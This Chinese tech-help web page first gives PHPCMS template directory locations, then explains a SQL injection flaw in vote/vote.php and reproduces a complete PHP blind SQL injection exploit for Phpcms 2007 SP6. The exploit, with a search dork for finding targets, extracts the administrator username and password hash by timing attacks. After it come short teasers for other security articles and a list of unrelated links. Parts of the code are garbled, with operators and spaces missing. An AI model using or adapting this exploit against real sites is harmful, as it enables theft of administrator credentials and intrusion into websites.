phpcms模板在哪个文件夹?phpcms模板sql注射漏洞是怎么样的?
1.phpcms模板在哪个文件夹?
phpcms2008 目录:\templates\default\ 常用的模版在phpcms下面
phpcms v9 目录:\phpcms\\templates\default\ 常用的模版在content下面
2.phpcms模板sql注射漏洞是怎么样的?
漏洞代码:
vote/vote.php
// 22行
$optionids = is_array($op) ? implode(',',$op) : $op;
...
$db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number 1 WHERE optionid IN ($optionids) ");
漏洞很明显,没什么好说的,其他地方也有类似的问题,有兴趣的同学可以跟下,下面给个poc性质的exp[由于是盲注,效果不是很好]:p
代码:
#!/usr/bin/php
print_r('
---------------------------------------------------------------------------
Phpcms 2007 SP6 Bind SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by Phpcms 2007"
---------------------------------------------------------------------------
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host:target server (ip/hostname)
path:path to phpcms
Example:
php '.$argv[0].' localhost /phpcms/
---------------------------------------------------------------------------
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$benchmark = 100000000;
$timeout = 10;
$cmd = 'voteid=999999&attribute=1&op=999999)ANDryat#';
$resp = send();
preg_match('/([a-z0-9] )_vote_option/', $resp, $pre);
if ($pre) {
echo "Plz Waiting...\n";
/**
* get admin password
*/
$j = 1;
$pass = '';
$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 102)); //a-f letters
while (strlen($pass) < 32) {
for ($i = 0; $i <= 255; $i ) {
if (in_array($i, $hash)) {
$cmd = 'voteid=999999&attribute=1&op=999999)AND(IF((ASCII(SUBSTRING((SELECTpasswordFROM'.$pre[1].'_memberWHEREgroupid=1LIMIT1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))#';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$pass .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ;
}
echo "\t";
/**
* get admin username
*/
$j = 1;
$user = '';
while (strstr($user, chr(0)) === false) {
for ($i = 0; i <= 255; $i ) {
$cmd = 'voteid=999999&attribute=1&op=999999)AND(IF((ASCII(SUBSTRING((SELECTusernameFROM'.$pre[1].'_memberWHEREgroupid=1LIMIT1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))#';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$user .= chr($i);
echo chr($i);
break;
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ;
}
exit("Expoilt Success!\nadmin:\t$user\nPassword(md5):\t$pass\n");
} else
exit("Exploit Failed!\n");
function send()
{
global $host, $path, $cmd;
$message = "POST ".$path."vote/vote.phpHTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "CLIENT-IP: ".time()."\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
怎么保护dns服务器?dns服务器的十种保护方法
本文收集总结了几点保护DNS服务器的有效方法,感兴趣的小伙伴们可以参考一下。
详情2018-01-04 17:09:39责编:llp 来源:驱动管家心脏出血漏洞检测 心脏出血漏洞检测软件
小编带来了心脏出血漏洞检测软件下载地址,大家可以下载心脏出血漏洞一键检测app,为了我们账户的安全,大家都可以检测一下自己的手机是否存在心脏出血漏洞哦~尽管“心脏出血”是一个网络漏洞,但是某些手机App通
详情2018-01-07 08:24:37责编:llp 来源:驱动管家2016年木马病毒查杀软件的排行榜
现在的电脑杀毒软件种类很多,在选择的时候,很多人并不知道如何去进行选,按照什么标准来进行选择,其实在选择杀毒软件首先要看杀毒能力,其次可以根据杀毒软件的功能来进行判定排名,下面就和大家一起来分析一
详情2018-01-05 13:58:41责编:llp 来源:驱动管家文档安全的加密技术 文档安全加密系统的原理
加密技术是利用数学或物理手段,对电子信息在传输过程中或存储设备内的数据进行保护,以防止泄漏的技术。在信息安全技术中,加密技术占有重要的地位,在保密通信、数据安全、软件加密等均使用了加密技术。常用的
详情2018-01-13 15:37:44责编:llp 来源:驱动管家怎么查证你的浏览器存在ie漏洞?
JavaScript IE 6 漏洞 其利用代码如下: <script type= "text jscript "> function init() { document write( "The time is: " Date() ); } window onload = init; < script> 利用此代码可
详情2018-01-10 09:59:11责编:llp 来源:驱动管家物联网是什么?物联网时代该怎么保护你的隐私?
什么是物联网,我百度了好多地方,觉得答案实在太官方了。我觉得物联网就是把身边的一切连在一起,包括你曾经认为和网搭不上边的东西,沙发、电视、电饭煲,这一切都被网络连在一起。以后恐怕连战争,都是黑客之
详情2018-01-11 19:49:18责编:llp 来源:驱动管家手机root好不好?手机root为漏洞利用打开方便之门
也许你的手机ROOT只是为了安装一款游戏,安装一个工具。对我们普通人来说,ROOT代表着方便和自由,其实你不知道的是,它同时也为黑客带来了侵犯你隐私的方便和自由。看看ROOT后的手机是怎样为漏洞大开方便之门的
详情2018-01-12 10:55:50责编:llp 来源:驱动管家u盘病毒的分析 u盘病毒的应对策略
分析: U盘对病毒的传播要借助autorun inf文件的帮助,病毒首先把自身复制到u盘,然后创建一个autorun inf,在你双击u盘时,会根据autorun inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun inf文件的创建
详情2018-01-06 14:21:52责编:llp 来源:驱动管家电脑文件夹加密怎么做?硬件文件夹加密好还是软件文件夹加密好?
现在,在公司上班族中,由于每天都会形成很多工作文件,一些文件还涉及到单位的无形资产和商业机密,如何保护这些文件的安全就成为当前企业网络管理的重要方面。而对于电脑文件加密,则通常有两种方法:软件加密
详情2018-01-07 08:28:05责编:llp 来源:驱动管家科迅会员上传webshell漏洞?文件webshell漏洞怎么修复?
会员上传文件漏洞,可以上传任意后缀user swfupload asp文件漏洞复制代码代码如下:If UpFileObj Form( "NoReName ")= "1 " Then & 39;不更名Dim PhysicalPath,FsoObj:Set FsoObj = KS InitialObject(KS Settin
详情2018-01-11 14:54:27责编:llp 来源:驱动管家
- python爬虫问题 python爬虫怎么处理动态网页?
- pc端的浏览器哪个好?哪款浏览器使用效果更好?
- 百度贴吧怎么发帖子?用手机怎么发百度贴吧?
- 显卡驱动有什么用?为什么要更新显卡驱动
- 杰微主板bios怎么设置?主板bios设置方法介绍
- 电脑连接无线网络的时候提示区域中找不到无线网络怎么办
- u盘里的文件不见了可以是这些原因造成的?怎么找回u盘文件
- 没钱买iphone6?可以尝试一下iphone6分期付款
- 刷机后开不了机别担心!这里有刷机后开不了机的解决方案
- 电脑虚拟内存太低怎么办?怎么增加电脑虚拟内存?
- 华为交换机真伪怎么看?华为交换机保修查询
- ripper病毒怎么删除?U盘里的ripper病毒无法删除怎么办?
- 为了网络安全,redhat linux怎么设置防火墙?
- 百度贴吧小尾巴怎么设置出来的?百度贴吧小尾巴设置教程
- 怎么用手机支付宝钱包付款?支付宝付款方式设置
- 想要买华硕商务本 选购哪个比较好
- 华硕游戏本g750jz到底好不好?我们来看下这个
- 不知道磊科无线路由器怎么设置?看这里
- 这个办法教你快速将Linux命令设置成键盘快捷键
- 重装win10系统后上不了网是怎么回事儿?要怎么解决